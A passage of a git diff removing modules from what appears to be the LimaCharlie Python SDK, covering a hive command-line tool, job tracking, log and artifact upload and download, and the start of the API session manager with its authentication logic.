-    printData( Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).delete( args.key ) )
-
-def _do_rename( args, man ):
-    if args.key is None:
-        reportError( 'Key required' )
-
-    if args.renameKey is None:
-        reportError('Rename key required')
-
-    if args.hive_name is None:
-        reportError('Hive name required')
-
-    printData( Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).rename( args.key, args.renameKey ) )
-
-def _do_validate( args, man ):
-    if args.key is None:
-        reportError( 'Key required' )
-
-    record = {
-        'data' : None,
-    }
-
-    if args.data is not None:
-        if args.data == '-':
-            data = "\n".join( sys.stdin.readlines() )
-        else:
-            data = open( args.data, 'rb' ).read().decode()
-        if args.dataKey is not None:
-            data = json.dumps( { args.dataKey : data } )
-        data = json.loads( data )
-        record[ 'data' ] = data
-
-    usrMtd = {}
-    if args.expiry is not None:
-        usrMtd[ 'expiry' ] = args.expiry
-    if args.enabled is not None:
-        usrMtd[ 'enabled' ] = args.enabled.lower() not in ( '0', 'false', 'no', 'off' )
-    if args.tags is not None:
-        usrMtd[ 'tags' ] = [ t.strip() for t in args.tags.split( ',' ) ]
-    if args.comment is not None:
-        usrMtd[ 'comment' ] = args.comment
-    record[ 'usr_mtd' ] = usrMtd
-
-    sysMtd = {}
-    if args.etag is not None:
-        sysMtd[ 'etag' ] = args.etag
-    record[ 'sys_mtd' ] = sysMtd
-
-    printData( Hive( man, args.hive_name, altPartitionKey = args.partitionKey ).validate( HiveRecord( args.key, record ) ) )
-
-def main( sourceArgs = None ):
-    import argparse
-
-    actions = {
-        'list' : _do_list,
-        'list_mtd' : _do_list_mtd,
-        'get' : _do_get,
-        'get_mtd' : _do_get_mtd,
-        'set' : _do_add,
-        'update' : _do_update,
-        'remove' : _do_remove,
-        'rename': _do_rename,
-        'validate' : _do_validate,
-    }
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie hive' )
-    parser.add_argument( 'action',
-                         type = str,
-                         help = 'the action to take, one of: %s' % ( ', '.join( actions.keys(), ) ) )
-    
-    parser.add_argument( 'hive_name',
-                         type = str,
-                         help = 'the hive name' )
-
-    parser.add_argument( '-k', '--key',
-                         type = str,
-                         required = False,
-                         dest = 'key',
-                         default = None,
-                         help = 'the name of the key.' )
-    parser.add_argument('-rk', '--rename-key',
-                        type=str,
-                        required=False,
-                        dest='renameKey',
-                        default=None,
-                        help='the new name of key to be renamed')
-
-    parser.add_argument( '-d', '--data',
-                         default = None,
-                         required = False,
-                         dest = 'data',
-                         help = 'file containing the JSON data for the record, or "-" for stdin.' )
-
-    parser.add_argument( '-dk', '--data-key',
-                         default = None,
-                         required = False,
-                         dest = 'dataKey',
-                         help = 'some hives expect data to be located within a specific key of the json data, wrap the --data content in this key.' )
-
-    parser.add_argument( '--data-only',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'dataOnly',
-                         help = 'only print the data of the record, not the metadata.' )
-
-    parser.add_argument( '-pk', '--partition-key',
-                         default = None,
-                         required = False,
-                         dest = 'partitionKey',
-                         help = 'the partition key to use instead of the default OID.' )
-
-    parser.add_argument( '--etag',
-                         default = None,
-                         required = False,
-                         dest = 'etag',
-                         help = 'the optional previous etag expected for transactions.' )
-
-    parser.add_argument( '--expiry',
-                         default = None,
-                         required = False,
-                         type = int,
-                         dest = 'expiry',
-                         help = 'a millisecond epoch timestamp when the record should expire.' )
-
-    parser.add_argument( '--enabled',
-                         default = None,
-                         required = False,
-                         dest = 'enabled',
-                         help = 'whether the record is enabled or disabled.' )
-
-    parser.add_argument( '--tags',
-                         default = None,
-                         required = False,
-                         dest = 'tags',
-                         help = 'comma separated list of tags.' )
-
-    parser.add_argument( '--comment',
-                         default = None,
-                         required = False,
-                         dest = 'comment',
-                         help = 'a comment for the record.' )
-
-    args = parser.parse_args( sourceArgs )
-
-    man = Manager( None, None )
-    if args.partitionKey is None:
-        args.partitionKey = man._oid
-    actions[ args.action.lower() ]( args, man )
-
-if '__main__' == __name__:
-    main()
diff --git a/limacharlie/Jobs.py b/limacharlie/Jobs.py
deleted file mode 100644
index fcb9fcbd..00000000
--- a/limacharlie/Jobs.py
+++ /dev/null
@@ -1,78 +0,0 @@
-from .Sensor import Sensor
-
-from .utils import GET
-from .utils import DELETE
-
-class Job( object ):
-    '''Representation of a Job created by Services.'''
-
-    def __init__( self, manager, data ):
-        self._man = manager
-        self.jobId = None
-        self.lastNarration = None
-        self.cause = None
-        self.finished = None
-        self.changed = None
-        self.created = None
-        self.sensors = None
-        self.service = None
-        self.activity = None
-        self._data = data
-        self._parseData( data )
-
-    def _parseData( self, data ):
-        self.jobId = data.get( 'job_id', None )
-        self.lastNarration = data.get( 'last_narration', None )
-        self.cause = data.get( 'cause', None )
-        self.finished = data.get( 'stopped', None )
-        self.changed = data.get( 'last_change', None )
-        if self.changed is not None:
-            # The Changed timestamp is not ms-based
-            # but the others are so we normalize.
-            self.changed = self.changed * 1000
-        self.created = data.get( 'created', None )
-        self.sensors = [ Sensor( self._man, s ) for s in data.get( 'sids', [] ) ]
-        self.service = data.get( 'replicant', None )
-        if 'record' in data:
-            self.activity = data[ 'record' ].get( 'hist', None )
-
-    def update( self ):
-        '''Fetch any updates to the job found in the cloud.'''
-
-        data = self._man._apiCall( 'job/%s/%s' % ( self._man._oid, self.jobId ), GET, queryParams = {
-            'is_compressed' : 'true',
-            'with_data' : 'false',
-        } )
-        data = self._man._unwrap( data[ 'job' ] )
-        self._data = data
-        self._parseData( data )
-
-    def fetchDetails( self ):
-        '''Fetch detailed activity for this job in the cloud.'''
-
-        data = self._man._apiCall( 'job/%s/%s' % ( self._man._oid, self.jobId ), GET, queryParams = {
-            'is_compressed' : 'true',
-            'with_data' : 'true',
-        } )
-        data = self._man._unwrap( data[ 'job' ] )
-        self._data = data
-        self._parseData( data )
-
-    def delete( self ):
-        '''Delete this job.'''
-
-        self._man._apiCall( 'job/%s/%s' % ( self._oid, self.jobId ), DELETE )
-
-    def isFinished( self ):
-        '''Check if this job has terminated.
-
-        Returns:
-            True if the job is finished.
-        '''
-        return self.finished is not None
-
-    def __str__( self ):
-        return "Job-%s@[%s]" % ( self.jobId, ", ".join( [ str( s ) for s in self.sensors ] ) )
-
-    def __repr__( self ):
-        return "Job-%s@[%s]" % ( self.jobId, ", ".join( [ str( s ) for s in self.sensors ] ) )
\ No newline at end of file
diff --git a/limacharlie/Logs.py b/limacharlie/Logs.py
deleted file mode 100644
index c391ae00..00000000
--- a/limacharlie/Logs.py
+++ /dev/null
@@ -1,398 +0,0 @@
-from limacharlie import Manager
-from .utils import LcApiException
-from .utils import GET
-from .utils import POST
-
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib2 import HTTPError
-    from urllib2 import Request as URLRequest
-    from urllib2 import urlopen
-    from urlparse import urlparse
-else:
-    from urllib.error import HTTPError
-    from urllib.request import Request as URLRequest
-    from urllib.request import urlopen
-    from urllib.parse import urlparse
-
-import os
-import os.path
-import uuid
-import base64
-import json
-import requests
-import time
-import tempfile
-
-MAX_UPLOAD_PART_SIZE = ( 1024 * 1024 * 15 )
-
-class Logs( object ):
-    '''Helper object to upload External Logs to limacharlie.io without going through a sensor.'''
-
-    def __init__( self, manager, accessToken = None ):
-        '''Create a Log manager object to prepare for upload.
-
-        Args:
-            manager (limacharlie.Manager obj): a Manager to use for identification (NOT authentication since API key is not required for this utility class).
-            accessToken (str): an ingestion key to use for log upload.
-        '''
-
-        self._lc = manager
-        self._accessToken = accessToken
-
-        if self._accessToken is None:
-            # Load the token from an environment variable.
-            self._accessToken = os.environ.get( 'LC_LOGS_TOKEN', None )
-
-        if self._accessToken is not None:
-            self._accessToken = str( uuid.UUID( str( self._accessToken ) ) )
-        self._uploadUrl = None
-
-    def upload( self, filePath, source = None, hint = None, payloadId = None, allowMultipart = False, originalPath = None, nDaysRetention = 30 ):
-        '''Upload a log.
-
-        Args:
-            filePath (str): path to the file to upload.
-            source (str): optional source identifier for where the log came from.
-            hint (str): optional data format hint for the log.
-            payloadId (str): optional unique payload identifier for the log, used to perform idempotent uploads.
-            allowMultipart (bool): unused, if True will perform multi-part upload for large logs.
-            nDaysRetention (int): number of days the data should be retained in the cloud.
-        '''
-
-        if self._accessToken is None:
-            raise LcApiException( 'access token not specified' )
-
-        if self._uploadUrl is None:
-            # Get the ingest URL from the API.
-            self._uploadUrl = self._lc.getOrgURLs()[ 'logs' ]
-
-        headers = {
-            'Authorization' : 'Basic %s' % ( base64.b64encode( ( '%s:%s' % ( self._lc._oid, self._accessToken ) ).encode() ).decode(), )
-        }
-
-        if source is not None:
-            headers[ 'lc-source' ] = source
-        if hint is not None:
-            headers[ 'lc-hint' ] = hint
-        if payloadId is not None:
-            headers[ 'lc-payload-id' ] = payloadId
-        if originalPath is not None:
-            headers[ 'lc-path' ] = base64.b64encode( os.path.abspath( originalPath ).encode() ).decode()
-        if nDaysRetention is not None:
-            headers[ 'lc-retention-days' ] = str( nDaysRetention )
-
-        with open( filePath, 'rb' ) as f:
-            # Get the file size.
-            f.seek( 0, 2 )
-            fileSize = f.tell()
-            f.seek( 0 )
-
-            if MAX_UPLOAD_PART_SIZE > fileSize:
-                # Simple single-chunk upload.
-                request = URLRequest( str( 'https://%s/ingest' % ( self._uploadUrl, ) ),
-                                      data = f.read(),
-                                      headers = headers )
-
-                try:
-                    u = urlopen( request )
-                except HTTPError as e:
-                    raise Exception( '%s: %s' % ( str( e ), e.read().decode() ) )
-                try:
-                    response = json.loads( u.read().decode() )
-                except:
-                    response = {}
-            else:
-                # Multi-part upload.
-                partId = 0
-                if payloadId is None:
-                    headers[ 'lc-payload-id' ] = str( uuid.uuid4() )
-
-                while True:
-                    chunk = f.read( MAX_UPLOAD_PART_SIZE )
-                    if not chunk:
-                        break
-
-                    if len( chunk ) != MAX_UPLOAD_PART_SIZE:
-                        headers[ 'lc-part' ] = "done"
-                    else:
-                        headers[ 'lc-part' ] = str( partId )
-
-                    request = URLRequest( str( 'https://%s/ingest' % ( self._uploadUrl, ) ),
-                                          data = chunk,
-                                          headers = headers )
-                    try:
-                        u = urlopen( request )
-                    except HTTPError as e:
-                        raise Exception( '%s: %s' % ( str( e ), e.read().decode() ) )
-                    try:
-                        response = json.loads( u.read().decode() )
-                    except:
-                        response = {}
-
-                    partId += 1
-
-        return response
-
-    def getOriginal( self, payloadId, filePath = None, fileObj = None, optParams = {}, customGetter = None ):
-        '''Download an orginal log.
-
-        Args:
-            payloadId (str): the payload identifier to download.
-            filePath (str): optional path where to download the file to.
-            fileObj (file obj): optional file object where to write the log.
-        '''
-
-        if optParams is None or 0 == len( optParams ):
-            response = self._lc._apiCall( 'insight/%s/artifacts/originals/%s' % ( self._lc._oid, payloadId ), POST )
-        else:
-            response = self._lc._apiCall( 'insight/%s/artifacts/originals/%s' % ( self._lc._oid, payloadId ), POST, params = optParams )
-
-        # If no local output is specified, we interpret this
-        # as an asynchronous export request.
-        if filePath is None and fileObj is None and ( optParams is None or 0 == len( optParams ) ):
-            if 'payload' in response:
-                return response[ 'payload' ]
-            return response[ 'export' ]
-
-        # Response can either be inline if small enough.
-        if 'payload' in response:
-            data = self._lc._unwrap( response[ 'payload' ], isRaw = True )
-            if filePath is not None:
-                with open( filePath, 'wb' ) as f:
-                    f.write( data )
-            elif fileObj is not None:
-                fileObj.write( data )
-            response.pop( 'payload', None )
-        elif optParams is not None and 0 != len( optParams ) and customGetter is None:
-            pass
-        # Or it can be a GCS signed URL.
-        elif 'export' in response:
-            # The export is asynchronous, so we will retry
-            # every 5 seconds up to 10 minutes.
-            maxWaitTime = 60 * 10
-            retryEvery = 5
-            if customGetter is not None:
-                # A custom getter was provided, so assume it takes care of auth.
-                # The export is a path to a GCP blob. Break it down into its parts
-                # for code clarity.
-                exportInfo = urlparse( response[ 'export' ] )
-                bucketName, blobName = exportInfo.path.lstrip( '/' ).split( '/', 1 )
-                for _ in range( int( maxWaitTime / retryEvery ) ):
-                    # Getter signals it has been successful by returning true-ish.
-                    if customGetter( bucketName, blobName, filePath, fileObj ):
-                        break
-                    time.sleep( retryEvery )
-                else:
-                    raise LcApiException( "Failed to get artifact." )
-            else:
-                # We attempt to get the data assuming this is an unauthenticated
-                # request like a Signed URL (which is the default provided by LC).
-                status = None
-                for _ in range( int( maxWaitTime / retryEvery ) ):
-                    dataReq = requests.get( response[ 'export' ], stream = True )
-                    status = dataReq.status_code
-                    if 200 == status:
-                        break
-                    dataReq.close()
-                    dataReq = None
-                    if 404 != status:
-                        break
-                    time.sleep( retryEvery )
-
-                if dataReq is None:
-                    raise LcApiException( "Failed to get artifact: %s." % ( status, ) )
-
-                try:
-                    if filePath is not None:
-                        with open( filePath, 'wb' ) as f:
-                            for chunk in dataReq.iter_content( chunk_size = 1024 * 1024 * 5 ):
-                                if not chunk:
-                                    continue
-                                f.write( chunk )
-                    elif fileObj is not None:
-                        for chunk in dataReq.iter_content( chunk_size = 1024 * 1024 * 5 ):
-                            if not chunk:
-                                continue
-                            fileObj.write( chunk )
-                    response.pop( 'export', None )
-                finally:
-                    dataReq.close()
-
-        return response
-
-    def listArtifacts( self, type = None, source = None, originalPath = None, after = None, before = None, withData = False, optParams = {}, customGetter = None ):
-        '''Get the list of artifacts matching parameters.
-
-        Args:
-            type (str): only list artifacts with type.
-            source (str): only list artifacts from this source.
-            originalPath (str): only list artifacts with this original path.
-            after (int): list artifacts after a given second epoch.
-            before (int): list artifacts before a given second epoch.
-            withData (bool): if True, artifact will be downloaded inline and the return value will be a tuple (artifactRecord, localFilePath).
-        '''
-
-        cursor = '-'
-        req = {}
-
-        if after is not None:
-            req[ 'start' ] = int( after )
-        if before is not None:
-            req[ 'end' ] = int( before )
-
-        if type is not None:
-            req[ 'hint' ] = type
-        if source is not None:
-            req[ 'source' ] = source
-
-        while cursor:
-            req[ 'cursor' ] = cursor
-            data = self._lc._apiCall( 'insight/%s/artifacts' % ( self._lc._oid, ), GET, queryParams = req )
-            cursor = data.get( 'next_cursor', None )
-            for artifact in data[ 'logs' ]:
-                # Right now we filter the path in user-mode since it's
-                # not yet supported by the service.
-                if originalPath is not None and artifact[ 'path' ] != originalPath:
-                    continue
-                if not withData:
-                    yield artifact
-                else:
-                    tmpFile = tempfile.NamedTemporaryFile( delete = False )
-                    try:
-                        artifact = self.getOriginal( artifact[ 'payload_id' ], filePath = tmpFile.name, fileObj = tmpFile, optParams = optParams, customGetter = customGetter )
-                        yield ( artifact, tmpFile.name )
-                    except:
-                        tmpFile.close()
-                        os.unlink( tmpFile.name )
-                        raise
-
-
-def main( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie artifacts' )
-
-    actions = {
-        'upload' : main_upload,
-        'get_original' : main_getOriginal,
-    }
-
-    parser.add_argument( 'artifact_action',
-                         type = str,
-                         help = 'action to take, one of %s' % ( ', '.join( actions.keys(), ) ) )
-
-    parser.add_argument( 'opt_arg',
-                         type = str,
-                         nargs = "?",
-                         default = None,
-                         help = 'optional argument depending on artifact_action' )
-
-    args = parser.parse_args( sourceArgs[ 0 : 1 ] )
-
-    if args.artifact_action not in actions:
-        print( "Unknown action: %s" % ( args.artifact_action, ) )
-        sys.exit( 1 )
-
-    return actions[ args.artifact_action ]( sourceArgs[ 1 : ] )
-
-def main_upload( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie artifacts upload' )
-
-    parser.add_argument( 'artifact_file',
-                         type = str,
-                         help = 'path to the artifacts file to upload.' )
-
-    parser.add_argument( '--source',
-                         type = str,
-                         required = False,
-                         dest = 'source',
-                         default = None,
-                         help = 'name of the source to associate with upload.' )
-
-    parser.add_argument( '--original-path',
-                         type = str,
-                         required = False,
-                         dest = 'originalPath',
-                         default = None,
-                         help = 'override the original path recorded for the artifacts.' )
-
-    parser.add_argument( '--hint',
-                         type = str,
-                         required = False,
-                         dest = 'hint',
-                         default = 'auto',
-                         help = 'artifacts type hint of the upload.' )
-
-    parser.add_argument( '--payload-id',
-                         type = str,
-                         required = False,
-                         dest = 'payloadId',
-                         default = None,
-                         help = 'unique identifier of the artifacts uploaded, can be used to de-duplicate artifacts.' )
-
-    parser.add_argument( '--access-token',
-                         type = uuid.UUID,
-                         required = False,
-                         dest = 'accessToken',
-                         default = None,
-                         help = 'access token to upload.' )
-
-    parser.add_argument( '--oid',
-                         type = lambda o: str( uuid.UUID( o ) ),
-                         required = False,
-                         dest = 'oid',
-                         default = None,
-                         help = 'organization id to upload for.' )
-
-    parser.add_argument( '--days-retention',
-                         type = int,
-                         required = False,
-                         dest = 'retention',
-                         default = None,
-                         help = 'number of days of retention for the data.' )
-
-    args = parser.parse_args( sourceArgs )
-
-    logs = Logs( Manager( args.oid, None, jwt = "" ), args.accessToken )
-
-    originalPath = args.originalPath
-    if args.originalPath is None:
-        originalPath = args.artifact_file
-
-    response = logs.upload( args.artifact_file,
-                            source = args.source,
-                            hint = args.hint,
-                            payloadId = args.payloadId,
-                            allowMultipart = False,
-                            originalPath = originalPath,
-                            nDaysRetention = args.retention )
-
-    print( json.dumps( response ) )
-
-def main_getOriginal( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie artifacts get_original' )
-
-    parser.add_argument( 'payloadid',
-                         type = str,
-                         help = 'unique identifier of the artifact uploaded.' )
-    parser.add_argument( 'destination',
-                         type = str,
-                         help = 'file path where to download the artifact.' )
-
-    args = parser.parse_args( sourceArgs )
-
-    logs = Logs( Manager() )
-
-    response = logs.getOriginal( args.payloadid, filePath = args.destination )
-
-    print( json.dumps( response ) )
diff --git a/limacharlie/Manager.py b/limacharlie/Manager.py
deleted file mode 100644
index 1ad96f09..00000000
--- a/limacharlie/Manager.py
+++ /dev/null
@@ -1,2507 +0,0 @@
-
-# Detect if this is Python 2 or 3
-import sys
-import os
-import shlex
-import ssl
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib2 import HTTPError
-    from urllib2 import Request as URLRequest
-    from urllib2 import urlopen
-    from urllib import urlencode
-    from urllib import quote as urlescape
-else:
-    from urllib.error import HTTPError
-    from urllib.request import Request as URLRequest
-    from urllib.request import urlopen
-    from urllib.parse import urlencode
-    from urllib.parse import quote as urlescape
-
-from typing import Any
-
-import uuid
-import traceback
-import cmd
-import zlib
-import base64
-import time
-import json
-from datetime import datetime, timezone
-from functools import wraps
-
-from .Sensor import Sensor
-from .Spout import Spout
-from .utils import LcApiException
-from .utils import GET
-from .utils import POST
-from .utils import DELETE
-from .request_utils import getCurlCommandString
-
-from .Jobs import Job
-from . import __version__
-
-from limacharlie import GLOBAL_OID
-from limacharlie import GLOBAL_UID
-from limacharlie import GLOBAL_API_KEY
-from limacharlie import GLOBAL_OAUTH
-from limacharlie import _getEnvironmentCreds
-
-from typing import Any, Optional, Callable
-
-from .user_agent_utils import build_user_agent
-
-def _build_user_agent():
-    """
-    Build a comprehensive User-Agent string with environment information.
-
-    Inspired by the Scalyr Agent implementation (Apache 2.0 licensed):
-    https://github.com/scalyr/scalyr-agent-2/blob/97c7405d4a8a7c2d376826779831e6be2753e2ce/scalyr_agent/scalyr_client.py#L881
-
-    The User-Agent includes:
-    - Library version
-    - Python version
-    - Operating system
-    - SSL/TLS version
-
-    Returns:
-        str: Formatted User-Agent string.
-
-    Example User-Agent strings:
-        - Linux: "lc-py-api/4.10.3;python-3.11.2;debian-12;openssl-3.0.0"
-        - macOS: "lc-py-api/4.10.3;python-3.11.2;macos-14.0;openssl-3.0.0"
-        - Windows: "lc-py-api/4.10.3;python-3.11.2;windows-10;openssl-3.0.0"
-    """
-    return build_user_agent('lc-py-api', __version__)
-
-ROOT_URL = 'https://api.limacharlie.io'
-API_VERSION = 'v1'
-
-API_TO_JWT_URL = 'https://jwt.limacharlie.io'
-
-HTTP_UNAUTHORIZED = 401
-HTTP_TOO_MANY_REQUESTS = 429
-HTTP_GATEWAY_TIMEOUT = 504
-HTTP_OK = 200
-
-# Default function to call with debug messages.
-DEFAULT_PRINT_DEBUG_FN: Optional[Callable[[str], None]] = None
-
-def set_default_print_debug_fn( fn: Optional[Callable[[str], None]] = None ):
-    """
-    Set a default function to call with debug messages.
-
-    Args:
-        fn (function): the function to call with debug messages.
-    """
-    global DEFAULT_PRINT_DEBUG_FN
-    DEFAULT_PRINT_DEBUG_FN = fn
-
-
-def _is_running_in_tests():
-    """
-    Check if the code is running under pytest or unittest.
-
-    Parameters:
-        None
-
-    Return:
-        bool: True if running under a test framework.
-    """
-    return 'pytest' in sys.modules or 'unittest' in sys.modules
-
-
-def _is_running_on_ci():
-    """
-    Check if the code is running on a CI environment (Cloud Build, GitHub Actions, etc.).
-
-    Parameters:
-        None
-
-    Return:
-        bool: True if running on CI.
-    """
-    # Cloud Build sets BUILD_ID, most CI systems set CI=true
-    return os.environ.get( 'CI' ) is not None or os.environ.get( 'BUILD_ID' ) is not None
-
-
-def _mask_secret( value, visible_chars = 4 ):
-    """
-    Mask a secret value, showing only the first few characters.
-
-    Parameters:
-        value (str): The secret value to mask.
-        visible_chars (int): Number of characters to show at the start.
-
-    Return:
-        str: Masked string like "abcd****" or "<not set>" if empty.
-    """
-    if not value:
-        return '<not set>'
-    value_str = str( value )
-    if len( value_str ) <= visible_chars:
-        return '*' * len( value_str )
-    return value_str[:visible_chars] + '*' * ( len( value_str ) - visible_chars )
-
-
-def _create_ssl_context():
-    """
-    Create an SSL context with SSL_OP_IGNORE_UNEXPECTED_EOF flag set.
-
-    This flag is needed for compatibility with servers that don't send proper
-    close_notify alerts during SSL shutdown. OpenSSL 3.0+ treats this as a
-    protocol violation by default, but setting this flag restores the more
-    lenient behavior from OpenSSL 1.1.1.
-
-    Returns:
-        ssl.SSLContext: An SSL context configured for urllib, or None for Python 2
-    """
-    if _IS_PYTHON_2:
-        # Python 2 doesn't support custom SSL contexts with urlopen
-        return None
-
-    try:
-        # Create default SSL context
-        ctx = ssl.create_default_context()
-
-        # Set SSL_OP_IGNORE_UNEXPECTED_EOF if available (Python 3.10+, OpenSSL 3.0+)
-        # This flag tells OpenSSL to treat unexpected EOFs as graceful shutdowns
-        # instead of protocol violations
-        if hasattr(ssl, 'OP_IGNORE_UNEXPECTED_EOF'):
-            ctx.options |= ssl.OP_IGNORE_UNEXPECTED_EOF
-
-        return ctx
-    except Exception:
-        # If SSL context creation fails, fall back to secure defaults
-        # Never return None as older Python versions may use insecure defaults
-        try:
-            return ssl.create_default_context()
-        except Exception:
-            return None
-
-
-class Manager( object ):
-    '''General interface to a limacharlie.io Organization.'''
-
-    def __init__( self, oid: Optional[str] = None, secret_api_key: Optional[str] = None, environment: Optional[str] = None, inv_id: Optional[str] = None, print_debug_fn: Optional[Callable[[str], None]] = None, is_interactive: bool = False, extra_params: dict[str, Any] = {}, jwt: Optional[str] = None, uid: Optional[str] = None, onRefreshAuth: Optional[Callable[[], None]] = None, isRetryQuotaErrors: bool = False, oauth_creds: Optional[dict] = None ):
-        '''Create a session manager for interaction with limacharlie.io, much of the Python API relies on this object.
-
-        Args:
-            oid (str): a limacharlie.io organization ID, default environment if unset.
-            secret_api_key (str): an API key for the organization, as provided by limacharlie.io, default environment if unset.
-            environment (str): an environment name as defined in "limacharlie login" to use.
-            inv_id (str): an investigation ID that will be used/propagated to other APIs using this Manager instance.
-            print_debug_fn (function(message)): a callback function that will receive detailed debug messages.
-            is_interactive (bool): if True, the manager will provide a root investigation and Spout so that tasks sent to Sensors can be tracked in realtime automatically; requires an inv_id to be set.
-            extra_params (dict): optional key / values passed to interactive spout.
-            jwt (str): optionally specify a single JWT to use for authentication.
-            uid (str): a limacharlie.io user ID, if present authentication will be based on it instead of organization ID, set to False to override the current environment.
-            onRefreshAuth (func): if provided, function is called whenever a JWT would be refreshed using the API key.
-            isRetryQuotaErrors (bool): if True, the Manager will attempt to retry queries when it gets an out-of-quota error (HTTP 429).
-            oauth_creds (dict): OAuth credentials dictionary with 'id_token', 'refresh_token', and 'provider' keys.
-        '''
-        print_debug_fn = print_debug_fn or DEFAULT_PRINT_DEBUG_FN
-
-        # If an environment is specified, try to get its creds.
-        if environment is not None:
-            oid, uid, secret_api_key, oauth_creds = _getEnvironmentCreds( environment )
-            if (secret_api_key is None and oauth_creds is None) or ( oid is None and uid is None ):
-                raise LcApiException( 'LimaCharlie environment not configured, use "limacharlie login".')
-        else:
-            # Otherwise, try to take the values in parameter. But if
-            # they are not present, use the GLOBAL values.
-            if uid is None:
-                # Only inherit GLOBAL_UID when the API key also comes
-                # from globals.  Including a config-file uid alongside
-                # an explicit API key causes the JWT endpoint to reject
-                # the request with "unknown api key".
-                if secret_api_key is None and GLOBAL_UID is not None:
-                    uid = GLOBAL_UID
-            if oid is None:
-                if GLOBAL_OID is None and uid is None:
-                    raise LcApiException( 'LimaCharlie "default" environment not set, please use "limacharlie login".' )
-                oid = GLOBAL_OID
-            if secret_api_key is None and jwt is None and oauth_creds is None:
-                if GLOBAL_API_KEY is None and GLOBAL_OAUTH is None:
-                    raise LcApiException( 'LimaCharlie "default" environment not set, please use "limacharlie login".' )
-                secret_api_key = GLOBAL_API_KEY
-                if oauth_creds is None:
-                    oauth_creds = GLOBAL_OAUTH
-
-        try:
-            if oid is not None and oid != '-':
-                uuid.UUID( oid )
-        except:
-            raise LcApiException( 'Invalid oid, should be in UUID format.' )
-        try:
-            if secret_api_key is not None:
-                uuid.UUID( secret_api_key )
-        except:
-            if jwt is None and oauth_creds is None:
-                raise LcApiException( 'Invalid secret API key, should be in UUID format.' )
-        self._oid: Optional[str] = oid
-        self._uid: Optional[str] = uid if uid else None
-        self._onRefreshAuth: Optional[Callable[[], None]] = onRefreshAuth
-        self._secret_api_key: Optional[str] = secret_api_key
-        self._oauth_creds: Optional[dict] = oauth_creds
-        self._jwt: Optional[str] = jwt
-        self._debug: Callable[[str], None] = print_debug_fn
-        self._lastSensorListContinuationToken: Optional[str] = None
-        self._inv_id: Optional[str] = inv_id
-        self._spout: Optional[Spout] = None
-        self._is_interactive: bool = is_interactive
-        self._extra_params: dict[str, Any] = extra_params
-        self._isRetryQuotaErrors: bool = isRetryQuotaErrors
-        self._search_url: Optional[str] = None  # Cache for search API URL
-        if self._is_interactive:
-            if not self._inv_id:
-                raise LcApiException( 'Investigation ID must be set for interactive mode to be enabled.' )
-            self._refreshSpout()
-
-    def _unwrap( self, data, isRaw = False ):
-        if isRaw:
-            return zlib.decompress( base64.b64decode( data ), 16 + zlib.MAX_WBITS )
-        else:
-            return json.loads( zlib.decompress( base64.b64decode( data ), 16 + zlib.MAX_WBITS ).decode() )
-
-    def _refreshSpout( self ):
-        if not self._is_interactive:
-            return
-        if self._spout is not None:
-            self._spout.shutdown()
-            self._spout = None
-        self._spout = Spout( self, 'event', is_parse = True, inv_id = self._inv_id, extra_params = self._extra_params )
-
-    def _printDebug( self, msg ):
-        if self._debug is not None:
-            time_string = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%SZ")
-            self._debug( f"{time_string}: {msg}" )
-
-    def _refreshJWT( self, expiry = None, oid_override = None ):
-        '''Refresh or generate a new JWT.
-
-        Args:
-            expiry: Optional expiry time for the JWT.
-            oid_override: Optional OID to use instead of self._oid. Pass "-" to get a
-                          minimal JWT with only UID claim (no org permissions). This is
-                          useful for endpoints like /user/orgs that only need the UID.
-        '''
-        try:
-            # Determine which OID to use for JWT generation
-            effective_oid = oid_override if oid_override is not None else self._oid
-
-            # Check if we're using OAuth
-            if self._oauth_creds is not None:
-                # Use simplified OAuth manager
-                from .oauth_simple import SimpleOAuthManager
-                oauth_manager = SimpleOAuthManager()
-
-                # Ensure we have a valid token (handles refresh if needed)
-                updated_creds = oauth_manager.ensure_valid_token(self._oauth_creds)
-
-                if updated_creds is None:
-                    raise LcApiException('Failed to refresh OAuth token')
-
-                # Update our credentials if they were refreshed
-                if updated_creds != self._oauth_creds:
-                    self._oauth_creds = updated_creds
-
-                    # Update the credentials file with new tokens
-                    from . import utils
-                    # Determine environment from current config
-                    environment = os.environ.get('LC_CURRENT_ENV', 'default')
-                    utils.writeCredentialsToConfig(
-                        environment,
-                        self._oid,
-                        None,  # No API key
-                        uid=self._uid,
-                        oauth_creds=self._oauth_creds
-                    )
-
-                # Exchange Firebase JWT for LimaCharlie JWT
-                authData = { "fb_auth" : self._oauth_creds['id_token'] }
-                if effective_oid is not None:
-                    authData[ 'oid' ] = effective_oid
-                if expiry is not None:
-                    authData[ 'expiry' ] = int( expiry )
-
-                request = URLRequest( API_TO_JWT_URL,
-                                      urlencode( authData ).encode(),
-                                      headers = { "Content-Type": "application/x-www-form-urlencoded" } )
-                request.get_method = lambda: "POST"
-
-                # Use custom SSL context to handle OpenSSL 3.0+ stricter EOF handling
-                ssl_context = _create_ssl_context()
-                if not _IS_PYTHON_2 and ssl_context is not None:
-                    u = urlopen( request, context = ssl_context )
-                else:
-                    u = urlopen( request )
-                self._jwt = json.loads( u.read().decode() )[ 'jwt' ]
-                u.close()
-
-                if self._onRefreshAuth is not None:
-                    self._onRefreshAuth()
-                return
-
-            # Traditional API key flow
-            if self._secret_api_key is None:
-                raise Exception( 'No API key or OAuth credentials set' )
-            authData = { "secret" : self._secret_api_key }
-            if self._uid is not None:
-                authData[ 'uid' ] = self._uid
-            if effective_oid is not None:
-                authData[ 'oid' ] = effective_oid
-            if expiry is not None:
-                authData[ 'expiry' ] = int( expiry )
-            request = URLRequest( API_TO_JWT_URL,
-                                  urlencode( authData ).encode(),
-                                  headers = { "Content-Type": "application/x-www-form-urlencoded" } )
-            request.get_method = lambda: "POST"
-
